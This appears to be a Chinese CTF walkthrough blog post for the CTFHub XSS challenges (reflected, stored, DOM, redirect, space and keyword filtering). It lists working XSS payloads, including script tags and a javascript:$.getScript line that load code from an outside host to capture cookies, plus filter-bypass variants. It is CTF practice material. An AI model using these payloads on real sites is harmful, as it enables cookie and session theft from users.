CTFHub靶场:XSS

目录

反射型

存储型

DOM反射

DOM跳转

过滤空格

过滤关键词


反射型

查看是否存在弹窗

<script>alert(1)</script>

 查看脚本

<sCRiPt sRC=//uj.ci/ijy></sCrIpT>

 输入网页地址+脚本

  查看cookie的flag

存储型

查看是否存在弹窗

 查看脚本

<sCRiPt sRC=//uj.ci/ijy></sCrIpT>

输入脚本

  查看cookie的flag

DOM反射

查看是否存在弹窗

</script><script>alert(1)</script>

 查看脚本

</script><sCRiPt sRC=//uj.ci/ijy></sCrIpT>

  查看cookie的flag

DOM跳转

检查是否存在弹窗,可以放在url地址栏上执行

?jumpto=javascript:alert(1)

放入脚本,使用$.getScript功能是异步加载并执行

?jumpto=javascript:$.getScript("//uj.ci/ijy")

  ​​​​​​​查看cookie的flag

 

过滤空格

查看是否存在弹窗

<script>alert(1)</script>

 

有空格,用/代替 (/**/)

<sCRiPt/sRC=//uj.ci/ijy></sCrIpT>

  ​​​​​​​查看cookie的flag

过滤关键词

测试是否弹窗 

<scrscriptipt>alert(1)</scrscriptipt>

 查看脚本

 输入脚本

<sCRiPt sRC=//uj.ci/ijy></sCrIpT>

 

 ​​​​​​​查看cookie的flag

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值